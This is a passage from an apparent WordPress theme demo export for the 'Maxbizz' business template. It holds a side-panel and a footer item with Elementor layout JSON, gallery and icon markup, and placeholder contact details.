				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-6" href='https://maxbizz.s3.amazonaws.com/images/project-6.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-6-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-6-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-6-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-6-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-6.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure><figure class='gallery-item'>
				<a data-elementor-open-lightbox="yes" data-elementor-lightbox-slideshow="0979c03" data-elementor-lightbox-title="project-5" href='https://maxbizz.s3.amazonaws.com/images/project-5.jpg'><img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-5-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-5-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-5-1-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" /></a>
			</figure>
			<h4>Contact</h4>		
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23"></a>
				</h6>
								<p>+1-800-456-478-23</p>
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
				</h6>
								<p>411 University St, Seattle</p>
				<a href="mailto:%20maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:%20maxbizz@mail.com"></a>
				</h6>
								<p>maxbizz@mail.com</p>
					<a href="#" target="_blank" rel="noopener">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener">
						Instagram
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>253</wp:post_id>
		<wp:post_date><![CDATA[2020-04-24 07:40:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-04-24 07:40:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[side-panel]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"abdb372","elType":"section","settings":{"padding":{"unit":"px","top":"40","right":"40","bottom":"40","left":"40","isLinked":true},"background_background":"classic","background_color":"#282828"},"elements":[{"id":"42dd159","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"99ef7b3","elType":"widget","settings":{"logo_width":{"unit":"px","size":145,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03_White.svg","id":1933}},"elements":[],"widgetType":"ilogo"},{"id":"4408930","elType":"widget","settings":{"editor":"Over 10 years we help companies reach their financial and branding goals. Maxbizz is a values-driven consulting agency dedicated.","_margin":{"unit":"px","top":"0","right":"0","bottom":"27","left":"0","isLinked":false},"text_color":"#FFFFFF"},"elements":[],"widgetType":"text-editor"},{"id":"561f157","elType":"widget","settings":{"title":"Gallery","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"header_size":"h4","typography_typography":"custom","title_color":"#FFFFFF"},"elements":[],"widgetType":"heading"},{"id":"0979c03","elType":"widget","settings":{"wp_gallery":[{"id":800,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-10.jpg"},{"id":803,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-12.jpg"},{"id":811,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-9.jpg"},{"id":819,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-7.jpg"},{"id":827,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-6.jpg"},{"id":823,"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-5.jpg"}],"gallery_columns":"3","thumbnail_size":"maxbizz-portfolio-thumbnail-grid","open_lightbox":"yes"},"elements":[],"widgetType":"image-gallery"},{"id":"81b5457","elType":"widget","settings":{"title":"Contact","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"header_size":"h4","typography_typography":"custom","title_color":"#FFFFFF"},"elements":[],"widgetType":"heading"},{"id":"dfc527a","elType":"widget","settings":{"title_text":"","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#FFFFFF","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#FFFFFF","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"text_align_mobile":"left","description_typography_font_size":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"a86f8fa","elType":"widget","settings":{"title_text":"","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#FFFFFF","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":15,"sizes":[]},"title_typography_font_weight":"500","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#606060","title_typography_font_family":"Inter","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"c0cbcd5","elType":"widget","settings":{"title_text":"","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#FFFFFF","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"link":{"url":"mailto: maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"ca934ca","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"#E40000"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"#FF8523","_id":"e7140d6"}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":13,"sizes":[]},"icon_padding":{"unit":"em","size":0.6999999999999999555910790149937383830547332763671875,"sizes":[]},"icon_spacing":{"unit":"px","size":12,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(0, 0, 0, 0.2)","icon_color":"custom","hover_animation":"float","columns":"4"},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-24]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_width";i:1;s:10:"logo_image";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:10:"text_color";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:2;s:11:"header_size";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:2:{s:21:"typography_typography";i:2;s:11:"title_color";i:2;}}}}s:13:"image-gallery";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"section_gallery";a:4:{s:10:"wp_gallery";i:1;s:15:"gallery_columns";i:1;s:14:"thumbnail_size";i:1;s:13:"open_lightbox";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:13:{s:26:"content_vertical_alignment";i:3;s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;s:32:"description_typography_font_size";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:6:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;}s:20:"section_social_hover";a:1:{s:15:"hover_animation";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:7:"padding";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Footer 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/ot_footer_builders/footer-1/</link>
		<pubDate>Fri, 24 Jul 2020 09:02:09 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_footer_builders&#038;p=300</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-business/">
					<img src="https://maxbizz.s3.amazonaws.com/images/03_White.svg" alt="Maxbizz Business">
				</a>			        
		<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.</p>		
					<a href="#" target="_blank" rel="noopener">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener">
						Linkedin-in
											</a>
			<h6>About us</h6>		
					<ul>
							<li>
					<a href="#">					Contact us 
											</a>
									</li>
								<li>
					<a href="#">					Connect
											</a>
									</li>
								<li>
					<a href="#">					Subscribe
											</a>
									</li>
								<li>
					<a href="#">					Terms of use 
											</a>
									</li>
								<li>
					<a href="#">					Sitemap
											</a>
									</li>
						</ul>
					<ul>
							<li>
					<a href="#">					Careers
											</a>
									</li>
								<li>
					<a href="#">					Newsroom
											</a>
									</li>
								<li>
					<a href="#">					Case Studies
											</a>
									</li>
								<li>
					<a href="#">					Disclosures 
											</a>
									</li>
								<li>
					<a href="#">					Services
											</a>
									</li>
						</ul>
			<h6>Contacts</h6>		
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<a href="mailto:maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a>
				</h6>
								<p>maxbizz@mail.com</p>
			<h6>Subscribe</h6>		
		<p>Subscribe to our newsletter. Be always in trend!</p><p>Copyright © 2020 Maxbizz by OceanThemes. All Rights Reserved.</p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>300</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 09:02:09]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 09:02:09]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[footer-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_footer_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"fae9e04","elType":"section","settings":{"structure":"40","background_background":"classic","background_color":"#1E1E1E","padding":{"unit":"px","top":"120","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"bb981be","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"60673b0","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03_White.svg","id":1933},"_margin":{"unit":"px","top":"0","right":"0","bottom":"32","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"},{"id":"1eb16be","elType":"widget","settings":{"editor":"<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.<\/p>","text_color":"#C0C1C2","typography_typography":"custom","typography_line_height":{"unit":"px","size":30,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"fa79ab8","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-linkedin-in","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.90000000000000002220446049250313080847263336181640625,"sizes":[]},"icon_spacing":{"unit":"px","size":14,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(0, 0, 0, 0.2)","icon_color":"custom","hover_primary_color":"#4B83FC","icon_secondary_color":"#FFFFFF","icon_primary_color":"#24262F","columns":"3"},"elements":[],"widgetType":"social-icons"}],"isInner":false},{"id":"1680f0a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"1267add","elType":"widget","settings":{"title":"About us","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":22,"sizes":[]},"typography_font_weight":"600","_margin":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"fbd6b12","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20"},"elements":[{"id":"265897a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":50,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"12","left":"0","isLinked":false}},"elements":[{"id":"1b77f88","elType":"widget","settings":{"icon_list":[{"text":"Contact us ","selected_icon":{"value":"","library":""},"_id":"dd541d7","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Connect","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"04c8029"},{"text":"Subscribe","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"0bf2a4d"},{"text":"Terms of use ","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"30f616c"},{"text":"Sitemap","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"5720c29"}],"space_between":{"unit":"px","size":10,"sizes":[]},"text_color":"#C0C1C2","text_color_hover":"#D92300","text_indent":{"unit":"px","size":0,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true},{"id":"7e3afb4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":50},"elements":[{"id":"b4606d1","elType":"widget","settings":{"icon_list":[{"text":"Careers","selected_icon":{"value":"","library":""},"_id":"dd541d7","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Newsroom","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"04c8029"},{"text":"Case Studies","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"0bf2a4d"},{"text":"Disclosures ","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"30f616c"},{"text":"Services","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"5720c29"}],"space_between":{"unit":"px","size":10,"sizes":[]},"text_color":"#C0C1C2","text_color_hover":"#D92300","text_indent":{"unit":"px","size":0,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"e888848","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"6be35dc","elType":"widget","settings":{"title":"Contacts","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":22,"sizes":[]},"typography_font_weight":"600","_margin":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"05e2c05","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"1366f2d","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":21,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"388fcf5","elType":"widget","settings":{"title_text":"Mail 